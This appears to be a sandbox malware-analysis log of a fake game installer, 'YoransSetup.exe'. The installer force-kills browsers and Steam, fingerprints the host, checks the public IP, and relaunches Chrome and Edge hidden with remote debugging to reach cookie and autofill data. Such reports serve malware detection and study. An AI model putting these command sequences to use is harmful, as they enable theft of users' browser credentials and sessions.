Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\package.json VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3-binding.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\package.json VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\dist\lib\index.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\dist\lib\registry.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\win-version-info\index.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\win-version-info\package.json VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Program Files\Google\Chrome\Application\chrome.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillRegex VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser VolumeInformationJump to behavior
